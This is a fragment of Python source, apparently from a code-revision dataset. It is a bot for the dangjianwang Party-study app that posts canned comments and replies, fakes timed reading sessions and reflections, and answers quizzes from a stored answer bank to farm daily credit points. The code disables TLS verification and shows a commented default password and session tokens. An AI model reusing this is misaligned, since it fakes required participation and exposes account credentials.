{}\\n提交内容: {}'.format(i[0], rjson[\n 'comment'])\n write2File(self, './results/', 'result.txt', log)\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[\n 0], rjson['comment'].strip())\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\n else:\n pass\n else:\n pass\n log = '帮助:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n return detail, log, helpInfo\n\n def doView(self):\n \"\"\"\n 党员视角发布功能\n\n :return:\n \"\"\"\n content = ['全面的小康,覆盖的人口要全面,是惠及全体人民的小康。', '不忘初心,牢记使命,坚持终身学习!']\n data = {'content': random.choice(content), 'token': self.token,\n 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n if rjson['code'] == '200':\n result = rjson['msg']\n if result == '操作成功':\n self.viewsResults.append(1)\n else:\n pass\n log = '党员视角:{}'.format(rjson)\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson[\n 'data']['content'])\n publicContent = rjson['data']['content']\n return detail, publicContent\n\n def doStudy(self, mid):\n \"\"\"\n 前三个post函数的响应的三个请求\n get用来获得填写的内容\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\n :param mid:\n :return:\n \"\"\"\n interval = 60 * 5 + 5\n\n def post1():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post1:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post2():\n data = {'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post2:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def post3():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习post3:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n\n def get1():\n url = (\n 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'\n .format(self.token, mid))\n rjson = self.session.get(url=url)\n text = rjson.content\n soup = BeautifulSoup(text, 'html.parser')\n retContents = []\n for div in soup.find_all('p'):\n p = div.text.strip()\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\n return random.choice(retContents)\n\n def recordFeeling(content=None):\n if not content:\n content = (\n '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\n )\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'content': content}\n commitUrl = (\n 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling')\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习recordFeeling:{}'.format(rjson)\n self.writeLog2File(log)\n print('in recordFeeling')\n print(log)\n if rjson['code'] == '200':\n return {'content': content}\n elif rjson['code'] == '1120':\n addtion = ['我们必须坚定不移,任何时候任何情况下都不能动摇',\n '人民有信心,国家才有未来,国家才有力量。', '新时代,属于自强不息、勇于创造的奋斗者。',\n '民主政治建设有序推进,依法治市迈出新步伐。', '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。']\n return recordFeeling(content='{}\\n{}'.format(content,\n random.choice(addtion)))\n else:\n return None\n\n def readTime():\n data = {'mid': mid, 'token': self.token, 'appid': self.appid,\n 'time': interval}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\n rjson = self.session.post(url=commitUrl, data=data, verify=False\n ).json()\n log = '学习readTime:{}'.format(rjson)\n self.writeLog2File(log)\n print(log)\n post1()\n time.sleep(1)\n post2()\n time.sleep(1)\n post3()\n time.sleep(1)\n content = get1()\n time.sleep(1)\n count = 0\n print('开始学习请稍后')\n for i in range(interval):\n count += 1\n if count % 30 == 0:\n print('已用时{}秒'.format(count))\n time.sleep(1)\n print('填写的学习体会', content)\n self.studyRsults.update(recordFeeling(content=content))\n time.sleep(1)\n readTime()\n time.sleep(1)\n pass\n\n def doExam(self):\n \"\"\"\n\n :param self:\n :return:\n \"\"\"\n ids = []\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\n rjson = self.session.post(url=examlistUrl, data=data, verify=False\n ).json()\n time.sleep(0.3)\n print('*' * 99)\n data = {'page': '1', 'page_size': '20', 'token': self.token,\n 'appid': self.appid}\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\n rjson = self.session.post(url=banklistUrl, data=data, verify=False\n ).json()\n for i in rjson['data']:\n tem = i['bank_name'], i['id']\n self.examlist.append(tem)\n if i['bank_name'] == '十九大报告100题(单选)':\n temp = {'title': i['bank_name'], 'detail': i['detail'],\n 'id': i['id']}\n self.examC19Info.append(temp)\n time.sleep(0.3)\n print('*' * 99)\n data = {'bank': '6', 'token': self.token, 'appid': self.appid}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n aa = rjson['data']\n paper = aa['id']\n for i in aa['questions']:\n temp = {'id': i['id'], 'content': i['content']}\n ids.append(temp)\n print('*' * 99)\n time.sleep(0.5)\n answers = []\n for i in ids:\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[\n 0]\n answerText = correctAnswer.answerText\n answer = correctAnswer.answer\n temp = {'index': i['id'], 'answer': answer}\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\n self.qaList.append(qa)\n print(qa, i['content'])\n answers.append(temp)\n time.sleep(1)\n hdata = {'token': self.token, 'appid': self.appid, 'paper': paper,\n 'answers': json.dumps(answers)}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\n rjson = self.session.post(url=commitUrl, data=hdata, verify=False\n ).json()\n print(rjson)\n print(self.examlist)\n print(self.examC19Info)\n print(self.qaList)\n\n def getAnswerInfo(self):\n \"\"\"\n 获得答题的结果与正确率\n :return:\n \"\"\"\n data = {'token': self.token, 'appid': self.appid, 'page_size': '20',\n 'page_index': 'page_index'}\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\n rjson = self.session.post(url=commitUrl, data=data, verify=False).json(\n )\n print(rjson)\n\n\n<mask token>\n",
"step-5": "import json\r\nimport os, django\r\n\r\n\r\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"dangjianyun.settings\")# project_name 项目名称\r\ndjango.setup()\r\nfrom dangjiansite.djfuncs import *\r\nimport os\r\nimport datetime\r\nimport requests\r\nimport time\r\nimport urllib3\r\nimport base64\r\nimport csv\r\nimport random\r\nfrom bs4 import BeautifulSoup\r\nfrom dangjiansite.models import *\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nclass Runner():\r\n\r\n # def __init__(self, appid='TJZHDJ01', username='024549', password='Aa1234'):\r\n def __init__(self, appid='TJZHDJ01', username='', password=''):\r\n urllib3.disable_warnings()#屏蔽ssl告警\r\n self.currentTime = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n self.username = username\r\n self.password = password\r\n self.thumbedFilePath = './lib/'.format(username)\r\n self.logFilePath = './log/'.format(username)\r\n self.errFilePath = './err/'.format(username)\r\n # self.thumbedFileList = self.getThumbFromFile()\r\n self.thumbedFileList = []\r\n self.debug = True\r\n self.session = requests.session()\r\n self.appid = appid#应该是本设备安装app的id 等换个设备试一下就知道了\r\n self.headers ={\r\n 'User-Agent': 'Dalvik/2.1.0 (Linux; U; Android 6.0; HUAWEI MLA-AL10 Build/HUAWEIMLA-AL10)',\r\n 'header_version': '80',\r\n 'system': 'android',\r\n 'Connection': 'Keep-Alive',\r\n 'Host': 'mapi.dangjianwang.com',\r\n }\r\n self.token = self.getToken()\r\n time.sleep(0.1)\r\n self.thumbPageList = self.getPages(urls=[\r\n 'https://mapi.dangjianwang.com/v3_1/Learn/List',\r\n 'https://mapi.dangjianwang.com/v3_1/Activities/List',\r\n 'https://mapi.dangjianwang.com/v3_1/Hotspots/Hotlist'\r\n ])\r\n self.thumbPages = [i[1] for i in self.thumbPageList]\r\n time.sleep(0.1)\r\n self.helpPageList = self.getPages(urls=['https://mapi.dangjianwang.com/v3_1/Help/List', ])\r\n self.helpPages = [i[1] for i in self.helpPageList]\r\n self.helpResults = {}\r\n time.sleep(0.1)\r\n self.studyPageList = self.getPagesII(urls=['https://mapi.dangjianwang.com/v3_1/Study/MaterialCollList'])\r\n self.studyPages = [i[1] for i in self.studyPageList]\r\n time.sleep(0.1)\r\n self.studyRsults = {}\r\n self.thumbedPages = []\r\n self.thumbResults = {}\r\n self.helpedPages = []\r\n self.multiThumbed = []#考虑最后要写入文件之中\r\n self.viewsResults = []\r\n self.examC19Info = []\r\n self.examlist = []\r\n self.qaList = []\r\n\r\n def getCurrentTime(self):\r\n return datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n\r\n\r\n def writeErr2File(self, err):\r\n path = self.logFilePath\r\n fullPath = '{}{}err.txt'.format(path, self.username)\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n with open(fullPath, 'a') as f:\r\n f.write('{}:{}\\n'.format(self.currentTime, err))\r\n print('err已经写入{}'.format(fullPath))\r\n\r\n def writeLog2File(self, log):\r\n path = self.logFilePath\r\n fullPath = '{}{}logs.txt'.format(path, self.username)\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n with open(fullPath, 'a') as f:\r\n f.write('{}:{}\\n'.format(self.currentTime, log))\r\n print('log已经写入{}'.format(fullPath))\r\n\r\n def writeThumb2File(self, id):\r\n path = self.thumbedFilePath\r\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n with open(fullPath, 'a') as f:\r\n f.write(',{}'.format(id))\r\n print('点赞记录已经写入{}'.format(fullPath))\r\n\r\n def getThumbFromFile(self):\r\n '''\r\n\r\n :return: 文件中id组成的列表\r\n '''\r\n path = self.thumbedFilePath\r\n inFileList = []\r\n fullPath = '{}{}thumbs.txt'.format(path, self.username)\r\n if not os.path.exists(fullPath):\r\n return fullPath\r\n with open(fullPath, 'r') as f:\r\n inFileList.extend(list(set(f.readlines()[0].split(','))))\r\n # print('getThumbFormFile', inFileList)\r\n with open(fullPath, 'w') as f1:\r\n f1.write(','.join(sorted(inFileList)))\r\n return inFileList\r\n\r\n def getExcuteTimes(self):\r\n '''\r\n 返回点赞等自动执行的次数的字典\r\n :return:\r\n '''\r\n excuteTimes = {}\r\n\r\n credInfo = self.getCredItinfo()\r\n print(credInfo)\r\n currentScore = credInfo[0]\r\n\r\n # 点赞次数\r\n thumbScore = credInfo[1]['信息评论'].split('/')[0]\r\n thumbExcuteTimes = 10 - int(thumbScore)\r\n excuteTimes.update({'thumb': thumbExcuteTimes})\r\n # 帮助次数\r\n helpScore = credInfo[1]['互助广场回答'].split('/')[0]\r\n helpExctuteTimes = 2 - int(helpScore)\r\n excuteTimes.update({'help': helpExctuteTimes})\r\n # 党员视角发布次数\r\n viewScore = credInfo[1]['党员视角发布'].split('/')[0]\r\n viewExcuteTimes = int((4 - int(viewScore)) / 2)\r\n excuteTimes.update({'view': viewExcuteTimes})\r\n # 在线知识竞答次数\r\n examScore = credInfo[1]['在线知识竞答'].split('/')[0]\r\n examExcuteTimes = int((4 - int(examScore)) / 2)\r\n excuteTimes.update({'exam': examExcuteTimes})\r\n # 学习次数\r\n flag = int(credInfo[1]['在线阅读学习资料'].split('/')[1]) - int(credInfo[1]['在线阅读学习资料'].split('/')[0])\r\n flag1 = int(credInfo[1]['学习资料写体会'].split('/')[1]) - int(credInfo[1]['学习资料写体会'].split('/')[0])\r\n examExcuteTimes = 1 if flag != 0 or flag1 != 0 else 0\r\n excuteTimes.update({'study': examExcuteTimes})\r\n\r\n return excuteTimes\r\n\r\n def getToken(self):\r\n '''\r\n 获得一个连接的token\r\n 每个连接都需要使用到\r\n :return:\r\n '''\r\n data = {\r\n 'appid': self.appid,\r\n 'username': self.username,\r\n 'password': self.password,\r\n }\r\n longinurl = 'https://mapi.dangjianwang.com/v3_1/login'\r\n\r\n r = self.session.post(url=longinurl, data=data, verify=False)\r\n rjson = r.json()\r\n # print(type(rjson))\r\n # print(rjson)\r\n\r\n if rjson['code'] == '200':\r\n return rjson['token']\r\n else:\r\n print('token 获得失败')\r\n return None\r\n\r\n def getRJson(self, url):\r\n data={\r\n 'token': self.token,\r\n 'appid': self.appid\r\n }\r\n\r\n return self.session.post(url=url, data=data, verify=False).json()\r\n\r\n def getUserInfo(self):\r\n '''\r\n 获得一大串用户的信息,暂时没用\r\n :return:\r\n '''\r\n infoUrl = 'https://mapi.dangjianwang.com/v3_1/User/UserInfo'\r\n return self.getRJson(url=infoUrl)\r\n\r\n def getCredItinfoToday(self):\r\n '''\r\n 获得人员当前的得分等级参数\r\n :return:\r\n '''\r\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\r\n info = self.getRJson(url=creditInfourl)\r\n fullScore = info['data']['full']\r\n gainScore = info['data']['gain']\r\n currentLevel = info['data']['level']\r\n username = info['data']['name']\r\n ret = {\r\n 'fullScore': fullScore,\r\n 'gainScore': gainScore,\r\n 'currentLevel': currentLevel,\r\n 'username': username,\r\n }\r\n return ret\r\n\r\n\r\n def getCredItinfo(self):\r\n '''\r\n 获得用户的今日积分状态\r\n 可用来判断是否需要再继续流程\r\n 数据如下\r\n ('35', [('连续登录', '3/3'), ('手机端登录', '2/2'), ('信息评论', '10/10'), ('党员视角发布', '4/4'), ('互助广场回答', '2/2'), ('学习资料写体会', '5/5'), ('在线阅读学习资料', '5/5'), ('在线知识竞答', '4/4')])\r\n :return:(haved_credit, credit_detail)\r\n '''\r\n creditInfourl = 'https://mapi.dangjianwang.com/v3_1/User/CreditInfo'\r\n haved_credit = 0\r\n credit_detail = {}\r\n\r\n info = self.getRJson(url=creditInfourl)\r\n for k, v in info.items():\r\n if k == 'data':\r\n for k2, v2 in v.items():\r\n if k2 == 'haved_credit':\r\n haved_credit = v2\r\n if k2 == 'credit_detail':\r\n for i in v2:\r\n credit_detail.update({i['title']: i['score']})\r\n\r\n return (haved_credit, credit_detail)\r\n\r\n def getPages(self, urls):\r\n pages = []\r\n for url in urls:\r\n data = self.getRJson(url=url)\r\n for k, v in data.items():\r\n if k == 'data':\r\n for i in v:\r\n # pages.append({'pageId': i['id'], 'pageTitle': i['title']})\r\n # pages.append(i['id'])\r\n pages.append((i['title'], i['id']))\r\n\r\n return pages\r\n\r\n def getPagesII(self, urls):\r\n def getRJson(url):\r\n data = {\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'type_id': '791',\r\n 'page_index': '1',\r\n }\r\n\r\n return self.session.post(url=url, data=data, verify=False).json()\r\n pages = []\r\n for url in urls:\r\n data = getRJson(url=url)\r\n for k, v in data.items():\r\n # print(k, v)\r\n if k == 'data':\r\n for i in v:\r\n # pages.append({'pageId': i['id'], 'pageTitle': i['title']})\r\n # pages.append(i['id'])\r\n pages.append((i['name'], i['id']))\r\n\r\n return pages\r\n\r\n def doThumb(self, id):\r\n '''\r\n 点赞函数,操作与id对应的页面\r\n 每次记录对应的信息到文件\r\n :return:\r\n '''\r\n contents = [\r\n '关注',\r\n '关注!',\r\n '关注!!']\r\n data = {\r\n 'id': id,\r\n 'comment': random.choice(contents),\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Activities/CommentAct'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n print(rjson)\r\n if rjson['code'] == '1003':\r\n self.token = self.getToken()\r\n elif rjson['code'] == '200':\r\n result = rjson['msg']\r\n if result == '操作成功':\r\n self.thumbedPages.append(id)\r\n # print(self.thumbPageList)\r\n # print(len(self.thumbPageList), len(list(set(self.thumbPageList))))\r\n\r\n for i in list(set(self.thumbPageList)):\r\n if id == i[1]:\r\n temp = {'title': i[0]}\r\n self.thumbResults.update(temp)\r\n log = '信息点赞:\\n主题: {}\\n提交:{}'.format(i[0], data['comment'])\r\n detail = '{} 主题:{}\\n回复:{}\\n'.format(self.getCurrentTime(), i[0], data['comment'])\r\n write2File(self, './results/', 'result.txt', log)\r\n thumbInfo = {'title': i[0], 'reply': data['comment']}\r\n\r\n self.thumbPages.remove(id)\r\n self.writeThumb2File(id=id)\r\n\r\n return (detail, thumbInfo)\r\n elif rjson['code'] == '500' and rjson['msg'] == '评论过快,请求休息一会':\r\n print('因评论过快,等待一段时间')\r\n time.sleep(20)\r\n else:\r\n print('rjson', rjson)\r\n # self.multiThumbed.append(id)\r\n self.thumbedPages.remove(id)#不成功的时候也要去掉不然总会选到\r\n self.writeThumb2File(id=id)\r\n log = '点赞:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n time.sleep(10)\r\n\r\n\r\n def doHelp(self, id, callback=None):\r\n '''\r\n 互助功能\r\n :param id:\r\n :return:\r\n '''\r\n detail = ''\r\n helpInfo = None\r\n log = ''\r\n content = [\r\n '把党的政治建设摆在首位!',\r\n '不忘初心,牢记使命!',\r\n '发展史第一要务,人才是第一资源,创新是第一动力。',\r\n '要把党的领导贯彻到依法治国全过程和各方面',\r\n '毫不动摇坚持中国共产党领导',]\r\n data = {\r\n 'id': id,\r\n 'content': random.choice(content),\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n print(data)\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Help/PostComment'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n\r\n\r\n\r\n if rjson['code'] == '200':\r\n result = rjson['msg']\r\n if result == '操作成功':\r\n self.helpedPages.append(id)\r\n self.helpPages.remove(id)\r\n #记录成功的到result\r\n for i in self.helpPageList:\r\n if id == i[1]:\r\n curTime = self.getCurrentTime()\r\n # print('('*88)\r\n # print(curTime)\r\n self.helpResults.update({'title': id[0]})\r\n log = '互助:\\n主题: {}\\n提交内容: {}'.format(i[0], rjson['comment'])\r\n write2File(self, './results/', 'result.txt', log)\r\n # #写入数据库\r\n detail = '{} 主题: {}\\n提交内容: {}\\n'.format(curTime, i[0], rjson['comment'].strip())\r\n helpInfo = {'title': i[0], 'reply': rjson['comment']}\r\n else:\r\n pass\r\n else:\r\n pass\r\n\r\n log = '帮助:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n return (detail, log, helpInfo)\r\n\r\n def doView(self):\r\n '''\r\n 党员视角发布功能\r\n\r\n :return:\r\n '''\r\n\r\n content = [\r\n '全面的小康,覆盖的人口要全面,是惠及全体人民的小康。',\r\n '不忘初心,牢记使命,坚持终身学习!']\r\n data = {\r\n 'content': random.choice(content),\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Viewpoint/Create'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n if rjson['code'] == '200':\r\n result = rjson['msg']\r\n if result == '操作成功':\r\n self.viewsResults.append(1)\r\n # self.viewsResults.append(id)\r\n else:\r\n pass\r\n\r\n log = '党员视角:{}'.format(rjson)\r\n detail = '{} 党员视角:\\n发布内容:{}\\n'.format(self.getCurrentTime(), rjson['data']['content'])\r\n publicContent = rjson['data']['content']\r\n # print(detail)\r\n # self.writeLog2File(log)\r\n # print('党员视角'*12)\r\n # print(id)\r\n # print(log)\r\n # print('党员视角' * 12)\r\n return (detail, publicContent)\r\n\r\n def doStudy(self, mid):\r\n '''\r\n 前三个post函数的响应的三个请求\r\n get用来获得填写的内容\r\n 最后一个post是学习完离开并检测时间的函数如果成功说明该次学习成功。\r\n :param mid:\r\n :return:\r\n '''\r\n interval = 60 * 5 + 5\r\n def post1():\r\n data = {\r\n 'mid': mid,\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1//Study/CheckCollStatus'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习post1:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n def post2():\r\n data = {\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Login/CheckToken'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习post2:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n def post3():\r\n data = {\r\n 'mid': mid,\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/GetFeelingsNum'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习post3:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print(log)\r\n\r\n def get1():\r\n url = 'https://mapi.dangjianwang.com/v3_1/Study/MaterialDetail?token={}&mid={}'.format(self.token, mid)\r\n rjson = self.session.get(url=url)\r\n text = rjson.content\r\n soup = BeautifulSoup(text, 'html.parser')\r\n retContents = []\r\n for div in soup.find_all('p'):\r\n p = div.text.strip()\r\n retContents.append(p if 100 > len(p) < 200 else p[0:200])\r\n return random.choice(retContents)\r\n\r\n def recordFeeling(content=None):\r\n if not content:\r\n content = '伟大的时代造就伟大的人物。邓小平同志就是从中国人民和中华民族近代以来伟大斗争中产生的伟人,' \\\r\n '是我们大家衷心热爱的伟人。我们很多同志都曾经在他的领导和指导下工作过,他的崇高风范对我们来说是那样熟悉、那样亲切。' \\\r\n '邓小平同志崇高鲜明又独具魅力的革命风范,将激励我们在实现“两个一百年”奋斗目标、实现中华民族伟大复兴中国梦的征程上奋勇前进。'\r\n data = {\r\n 'mid': mid,\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'content': content\r\n }\r\n\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/RecordFeeling'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习recordFeeling:{}'.format(rjson)\r\n self.writeLog2File(log)\r\n print('in recordFeeling')\r\n print(log)\r\n\r\n if rjson['code'] == '200':\r\n return {'content': content}\r\n elif rjson['code'] == '1120':\r\n addtion = [\r\n '我们必须坚定不移,任何时候任何情况下都不能动摇',\r\n '人民有信心,国家才有未来,国家才有力量。',\r\n '新时代,属于自强不息、勇于创造的奋斗者。',\r\n '民主政治建设有序推进,依法治市迈出新步伐。',\r\n '一切公职人员,都必须牢记始终为人民利益和幸福而努力工作。',\r\n\r\n ]\r\n return recordFeeling(content= '{}\\n{}'.format(content, random.choice(addtion)))\r\n else:\r\n return None\r\n #记录回复的心得\r\n\r\n\r\n def readTime():\r\n data = {\r\n 'mid': mid,\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'time': interval,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/Study/ReadTime'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n log = '学习readTime:{}'.format(rjson)\r\n # self.studyRsults.update({'学习readTime', rjson})\r\n self.writeLog2File(log)\r\n print(log)\r\n\r\n\r\n\r\n post1()\r\n time.sleep(1)\r\n post2()\r\n time.sleep(1)\r\n post3()\r\n time.sleep(1)\r\n content = get1()\r\n time.sleep(1)\r\n # time.sleep(interval)\r\n count = 0\r\n print('开始学习请稍后')\r\n for i in range(interval):\r\n count += 1\r\n # print(i + 1)\r\n if count % 30 == 0:\r\n print('已用时{}秒'.format(count))\r\n time.sleep(1)\r\n # time.sleep(5)\r\n print('填写的学习体会', content)\r\n self.studyRsults.update(recordFeeling(content=content))\r\n time.sleep(1)\r\n readTime()\r\n time.sleep(1)\r\n pass\r\n\r\n def doExam(self):\r\n '''\r\n\r\n :param self:\r\n :return:\r\n '''\r\n ids = []\r\n data = {\r\n 'page': '1',\r\n 'page_size': '20',\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n examlistUrl = 'https://mapi.dangjianwang.com/v3_1/quora/examlist'\r\n rjson = self.session.post(url=examlistUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n # for i in rjson['data']:\r\n # print(i)\r\n time.sleep(0.3)\r\n #########################################################\r\n print('*' * 99)\r\n data = {\r\n 'page': '1',\r\n 'page_size': '20',\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n banklistUrl = 'https://mapi.dangjianwang.com/v3_1/exam/banklist'\r\n rjson = self.session.post(url=banklistUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n for i in rjson['data']:\r\n tem = (i['bank_name'], i['id'])\r\n self.examlist.append(tem)\r\n if i['bank_name'] == '十九大报告100题(单选)':\r\n # if i['bank_num'] == '65':\r\n temp = {\r\n 'title': i['bank_name'],\r\n 'detail': i['detail'],\r\n 'id': i['id'],\r\n }\r\n self.examC19Info.append(temp)\r\n # print(self.examC19Info)\r\n # print(self.examlist)\r\n time.sleep(0.3)\r\n #########################################################\r\n print('*' * 99)\r\n data = {\r\n 'bank': '6',\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n # print(rjson)\r\n aa = rjson['data']\r\n paper = aa['id']\r\n for i in aa['questions']:\r\n temp = {'id': i['id'], 'content': i['content']}\r\n ids.append(temp)\r\n\r\n #########################################################\r\n print('*' * 99)\r\n time.sleep(0.5)\r\n # 以下答题交卷\r\n\r\n answers = []\r\n # 先得到答案\r\n\r\n\r\n for i in ids:\r\n # 丛书据库获得答案\r\n correctAnswer = Qa.objects.filter(question__contains=i['content'])[0]\r\n answerText = correctAnswer.answerText\r\n answer = correctAnswer.answer\r\n #从文键获得答案\r\n # answerText = getAnswer(i['content'])[2]\r\n # answer = getAnswer(i['content'])[1]\r\n temp = {'index': i['id'], 'answer': answer}\r\n qa = {'index': i['id'], 'answer': answer, 'answerText': answerText}\r\n self.qaList.append(qa)\r\n print(qa, i['content'])\r\n answers.append(temp)\r\n time.sleep(1)\r\n hdata = {\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'paper': paper,\r\n 'answers': json.dumps(answers),\r\n # 'answers': [{'answer': 'A', 'index': '639'}, {'answer': 'A', 'index': '639'}],\r\n }\r\n # print('hdata:', hdata)\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/handpaper'\r\n rjson = self.session.post(url=commitUrl,\r\n data=hdata,\r\n verify=False).json()\r\n print(rjson)\r\n print(self.examlist)\r\n print(self.examC19Info)\r\n print(self.qaList)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def getAnswerInfo(self):\r\n '''\r\n 获得答题的结果与正确率\r\n :return:\r\n '''\r\n data = {\r\n 'token': self.token,\r\n 'appid': self.appid,\r\n 'page_size': '20',\r\n 'page_index': 'page_index',\r\n }\r\n commitUrl = 'https://mapi.dangjianwang.com/v3_1/exam/randexam'\r\n rjson = self.session.post(url=commitUrl,\r\n data=data,\r\n verify=False).json()\r\n print(rjson)\r\n\r\n\r\n'''\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/exam/randexam 答题地址 主id是交卷的paper 这里要获取到questions里的id 等于回答问题中的index \r\nappid\tTJZHDJ01\r\nbank\t6\r\ntoken\t5jTY47PbPZ0KdUprwmfJVfH4cX23tyDcV25XrEYkWVvElH3YjJpIb1JCDwq_\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/exam/handpaper 交卷的连接\r\nappid\tTJZHDJ01\r\nanswers\t[{\"index\":\"635\",\"answer\":\"D\"},{\"index\":\"640\",\"answer\":\"C\"},{\"index\":\"641\",\"answer\":\"B\"},{\"index\":\"665\",\"answer\":\"B\"},{\"index\":\"670\",\"answer\":\"B\"},{\"index\":\"673\",\"answer\":\"B\"},{\"index\":\"677\",\"answer\":\"C\"},{\"index\":\"682\",\"answer\":\"B\"},{\"index\":\"684\",\"answer\":\"C\"},{\"index\":\"690\",\"answer\":\"A\"}]\r\ntoken\t5jTY47PbPZ0KdUprwmfJVfH4cX23tyDcV25XrEYkWVvElH3YjJpIb1JCDwq_\r\npaper\t4565894\r\n\r\nhttps://mapi.dangjianwang.com/v3_1/exam/banklist 获得答题情况的连接\r\n\r\nappid\tTJZHDJ01\r\npage_size\t20\r\ntoken\t5jTY47PbPZxXeRxlkzScAPWidyvssy3TBD5Y9UYiCQnMmCfa2pRNb1JCDwq_\r\npage_index\t1\r\n\r\n\r\n\r\n\r\n--------------------------------------------------\r\nhttps://mapi.dangjianwang.com/v3_1/Study/MaterialCollList 